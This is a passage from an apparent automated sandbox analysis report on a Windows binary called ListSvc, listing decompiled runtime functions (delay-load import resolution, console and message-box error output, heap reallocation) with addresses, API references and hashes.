								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}

0x0040d22c
0x0040d232
0x0040d234
0x0040d237
0x0040d244
0x0040d251
0x0040d25e
0x0040d26b
0x0040d278
0x0040d285
0x0040d28e
0x0040d29c
0x0040d29e
0x0040d29f
0x0040d2a5
0x0040d2ab
0x0040d2b2
0x0040d2b4
0x0040d2ba
0x0040d2c0
0x0040d2d0
0x00000000
0x0040d2d5
0x0040d2e2
0x0040d2e7
0x0040d2e9
0x0040d2eb
0x0040d2eb
0x0040d2f1
0x0040d2f4
0x0040d2fc
0x0040d306
0x0040d309
0x0040d30e
0x0040d329
0x0040d310
0x0040d31c
0x0040d31c
0x0040d32c
0x0040d335
0x0040d34e
0x0040d350
0x0040d412
0x0040d412
0x0040d41c
0x0040d42a
0x0040d42a
0x0040d42e
0x0040d47b
0x0040d47d
0x0040d484
0x0040d48e
0x0040d49c
0x0040d49c
0x0040d4a0
0x0040d4a2
0x0040d4a7
0x0040d4ad
0x0040d4bd
0x0040d4c2
0x0040d4c2
0x0040d4a0
0x00000000
0x0040d430
0x0040d434
0x0040d46f
0x0040d479
0x00000000
0x0040d43c
0x0040d43f
0x0040d447
0x00000000
0x0040d460
0x0040d466
0x0040d46b
0x00000000
0x00000000
0x0040d4c5
0x0040d4c8
0x00000000
0x0040d4c8
0x0040d447
0x0040d434
0x0040d42e
0x0040d35d
0x0040d36b
0x0040d36b
0x0040d36f
0x0040d37a
0x0040d37a
0x0040d37e
0x0040d3cb
0x0040d3d7
0x0040d40d
0x0040d3d9
0x0040d3dd
0x0040d3e3
0x0040d3e8
0x0040d3ed
0x0040d3f4
0x0040d3fa
0x0040d3ff
0x0040d404
0x0040d404
0x0040d3ed
0x0040d3dd
0x00000000
0x0040d380
0x0040d385
0x0040d38f
0x0040d39d
0x0040d39d
0x0040d3a1
0x00000000
0x0040d3a3
0x0040d3a3
0x0040d3a8
0x0040d3ae
0x0040d3be
0x00000000
0x0040d3c3
0x0040d3a1
0x0040d337
0x0040d343
0x0040d347
0x00000000
0x0040d349
0x0040d4ca
0x0040d4d1
0x0040d4d5
0x0040d4d8
0x0040d4db
0x0040d4e4
0x0040d4e4
0x00000000
0x0040d4ea
0x0040d347

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}

0x004047b0
0x004047b3
0x004047b5
0x004047be
0x00404821
0x00404826
0x00404827
0x00404828
0x0040482a
0x004047c0
0x004047c9
0x004047d8
0x004047e4
0x004047e9
0x004047ef
0x004047fd
0x0040480b
0x0040481a
0x0040481a
0x00404832

APIs

GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A

Strings

9@, xrefs: 004047E4, 004047EF

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: 9@
API String ID: 3320372497-3209974744
Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}

0x0041f0fd
0x0041f0fe
0x0041f101
0x0041f106
0x0041f107
0x0041f10c
0x0041f10f
0x0041f122
0x0041f124
0x0041f12c
0x0041f1ca
0x0041f1cf
0x0041f1de
0x0041f1f8
0x0041f132
0x0041f132
0x0041f13c
0x0041f15a
0x0041f15c
0x0041f16b
0x0041f188
0x0041f1a0
0x0041f1ba
0x0041f1ba
0x0041f1ff
0x0041f202
0x0041f205
0x0041f20d
0x0041f218

APIs

Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID:
API String ID: 135118572-0
Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x00404464
0x00404464
0x00404464
0x0040446c
0x0040446e
0x004044fc
0x004044ff
0x0040476c
0x0040476d
0x0040476e
0x00404771
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dac
0x00403db5
0x00403dba
0x00403ea1
0x00403ea3
0x00403eb6
0x00403eb8
0x00403eba
0x00403ebc
0x00403ec2
0x00403ec6
0x00403ec6
0x00403ec9
0x00403ec9
0x00403ed2
0x00403ed9
0x00403ed9
0x00403ea5
0x00403ea5
0x00403eaa
0x00403eaa
0x00403dc0
0x00403dc9
0x00403dcf
0x00403dcb
0x00403dcb
0x00403dcb
0x00403ddb
0x00403dea
0x00403df7
0x00403e67
0x00403e6e
0x00403e70
0x00403e72
0x00403e74
0x00403e7a
0x00403e7e
0x00403e7e
0x00403e81
0x00403e81
0x00403e91
0x00403e98
0x00403e98
0x00403df9
0x00403df9
0x00403e05
0x00403e0b
0x00000000
0x00403e0d
0x00403e1e
0x00403e22
0x00403e24
0x00403e24
0x00403e3a
0x00000000
0x00403e52
0x00403e54
0x00403e57
0x00403e60
0x00403e63
0x00403e63
0x00403e3a
0x00403e0b
0x00403df7
0x00403ee7
0x00404777
0x00404777
0x00404779
0x00404779
0x00404505
0x00404507
0x0040450a
0x0040450b
0x0040450e
0x00404511
0x00404514
0x00404516
0x00404517
0x0040462c
0x0040462f
0x00404631
0x00404724
0x0040472f
0x00404736
0x00404738
0x0040473b
0x00404740
0x00404741
0x00404743
0x00000000
0x00404745
0x00404745
0x0040474b
0x0040474d
0x0040474d
0x00404750
0x00404758
0x0040475f
0x0040476a
0x0040476a
0x00404637
0x00404637
0x0040463a
0x0040463d
0x0040463f
0x00000000
0x00404645
0x00404645
0x0040464c
0x004046a9
0x004046a9
0x004046ae
0x004046b4
0x004046b9
0x004046ba
0x004046ba
0x004046c6
0x004046d7
0x004046dd
0x004046dd
0x004046df
0x004046ec
0x004046f3
0x004046f7
0x004046f9
0x004046ff
0x00404701
0x00404703
0x00404703
0x004046e1
0x004046e1
0x004046e5
0x004046e5
0x00404708
0x00404708
0x0040470a
0x0040470d
0x00404714
0x00404716
0x0040471a
0x0040464e
0x0040464e
0x00404653
0x0040465b
0x00000000
0x00000000
0x0040465d
0x0040465f
0x00404666
0x00000000
0x00404668
0x0040466c
0x00404671
0x00404672
0x00404678
0x00404680
0x00404686
0x0040468b
0x0040468c
0x00000000
0x0040468c
0x00404680
0x00000000
0x00404666
0x00404695
0x00404698
0x0040469b
0x0040469d
0x0040471d
0x0040471d
0x00000000
0x0040469f
0x0040469f
0x004046a2
0x004046a5
0x004046a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004046a7
0x0040469d
0x0040464c
0x0040463f
0x0040451d
0x00404520
0x00404522
0x0040452c
0x00404532
0x00404549
0x00404549
0x00404555
0x0040455b
0x0040455d
0x00404564
0x00404566
0x0040456b
0x00404573
0x00000000
0x00000000
0x00404575
0x00404577
0x0040457e
0x00000000
0x00404580
0x00404583
0x00404588
0x0040458e
0x00404596
0x0040459b
0x004045a0
0x00000000
0x004045a0
0x00404596
0x00000000
0x0040457e
0x004045a9
0x004045a9
0x004045a9
0x004045ae
0x004045b1
0x004045b3
0x004045b6
0x004045b9
0x004045c4
0x004045c6
0x004045c9
0x004045cb
0x004045cd
0x004045d3
0x004045d5
0x004045d5
0x004045bb
0x004045be
0x004045be
0x004045da
0x004045e0
0x004045e4
0x004045ea
0x004045f1
0x004045f1
0x004045f6
0x00404603
0x00404534
0x00404534
0x0040453a
0x00404604
0x00404608
0x0040460d
0x0040460f
0x00404611
0x00404619
0x00404620
0x00404625
0x00404625
0x0040462b
0x00404540
0x00404540
0x00404545
0x00404547
0x00000000
0x00000000
0x00000000
0x00000000
0x00404547
0x0040453a
0x00404524
0x00404524
0x00404528
0x00404528
0x00404522
0x00404517
0x00404474
0x00404474
0x00404476
0x0040447a
0x0040447d
0x0040447f
0x004044b8
0x004044bc
0x004044bd
0x004044bf
0x004044c1
0x004044c3
0x004044c6
0x004044c8
0x004044ca
0x004044cf
0x004044d1
0x004044d3
0x004044d9
0x004044db
0x004044db
0x004044e2
0x004044e2
0x004044e5
0x004044e7
0x004044f0
0x004044f5
0x004044f5
0x004044f7
0x004044f8
0x004044f9
0x004044fa
0x00404481
0x00404481
0x00404488
0x0040448a
0x00404490
0x00404492
0x00404494
0x00404499
0x0040449b
0x0040449d
0x0040449f
0x004044a1
0x004044ac
0x004044b1
0x004044b1
0x004044b3
0x004044b4
0x004044b5
0x0040448c
0x0040448c
0x0040448d
0x0040448e
0x0040448e
0x0040448a
0x0040447f

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388

Uniqueness

Uniqueness Score: -1.00%

Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 68%

